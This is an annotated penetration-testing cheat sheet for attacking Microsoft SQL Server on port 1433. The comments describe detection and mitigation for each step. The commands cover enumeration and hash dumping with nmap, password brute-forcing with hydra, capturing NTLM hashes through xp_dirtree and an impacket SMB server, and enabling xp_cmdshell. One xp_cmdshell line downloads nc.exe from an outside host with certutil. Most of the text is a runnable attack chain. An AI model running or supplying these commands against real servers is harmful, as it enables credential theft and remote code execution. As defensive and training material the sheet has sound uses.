# MSSQL - 1433
# 1433 is the default SQL Server TCP port; every step below assumes the instance
# listens there (see mssql.instance-port and -p 1433 in the nmap line).
# Get information
# Runs nmap's ms-sql-* NSE scripts. mssql.password= is deliberately empty, so
# ms-sql-empty-password tests for a blank 'sa' password; ms-sql-xp-cmdshell and
# ms-sql-dump-hashes only return data if the given login already has those rights.
# Mitigation: disable or rename 'sa', enforce a strong password, keep xp_cmdshell off.
nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 <IP>
# Brute force
# Online password guessing. Each failed attempt is a "Login failed for user" entry
# in the SQL Server error log / Windows Security log, so lockout policy and alerting
# on bursts of failed logons detect it.
# NOTE: the two lines use different placeholder styles (<IP>/<USERS_LIST> vs $ip/password.txt);
# substitute consistently.
hydra -L <USERS_LIST> -P <PASSWORDS_LIST> <IP> mssql -vV -I -u
hydra -l sa -P password.txt -V $ip mssql
# Having credentials
# impacket's mssqlclient.py: the first form uses Windows (NTLM) authentication with a
# domain account, the second SQL authentication.
mssqlclient.py -windows-auth <DOMAIN>/<USER>:<PASSWORD>@<IP>
mssqlclient.py <USER>:<PASSWORD>@<IP>
# Connect to MSSQL server
# sqsh client. Passing -P on the command line leaves the password in shell history
# and in process listings visible to other users on the host.
sqsh -S server_address -U sa -P password
# Once logged in you can run queries:
# Returns the server version string. T-SQL spells the function @@version (no space);
# the space below looks like a typo — confirm before relying on it.
SQL> select @@ version;
# Steal NTLM hash
# Starts an impacket SMB server (share named 'liodeus', serving the current directory)
# to receive the outbound authentication that xp_dirtree triggers below.
# Mitigation: block outbound SMB (TCP 445) from database hosts and alert on the SQL
# service account authenticating to unknown hosts.
sudo smbserver.py -smb2support liodeus .
# Steal the NTLM hash, crack it with john or hashcat
# xp_dirtree makes the SQL Server service account connect to the UNC path. <HOME> here
# is presumably the share name, i.e. the one given to smbserver.py above (liodeus).
# Detection: xp_dirtree/xp_fileexist with a UNC path is a common SQL Server audit and
# EDR signal.
SQL> exec master..xp_dirtree '\\<IP>\<HOME>\'
# Try to enable code execution
# enable_xp_cmdshell is a built-in helper of impacket's mssqlclient.py, not T-SQL; it
# effectively issues the sp_configure/reconfigure sequence shown in the OR branch.
SQL> enable_xp_cmdshell
# OR
# Requires the ALTER SETTINGS permission (sysadmin/serveradmin). xp_cmdshell is off
# by default and each change is written to the error log as a "Configuration option
# ... changed" message — alert on it and keep it disabled by policy.
SQL> exec sp_configure 'show advanced options', 1
SQL> reconfigure
SQL> exec sp_configure 'xp_cmdshell', 1
SQL> reconfigure
# Execute code
# Commands run under the SQL Server service account's token — one reason to run the
# service as a low-privilege account rather than LocalSystem or a domain admin.
SQL> xp_cmdshell whoami /all
# certutil -urlcache -split -f pulling from an external host is a widely signatured
# LOLBin pattern; process-creation logging of sqlservr.exe spawning cmd.exe/certutil.exe
# catches this.
SQL> xp_cmdshell certutil.exe -urlcache -split -f http://<IP>/nc.exe
# Manual exploit
# External reference for MSSQL injection payloads (not an executable command).
https://www.asafety.fr/mssql-injection-cheat-sheet/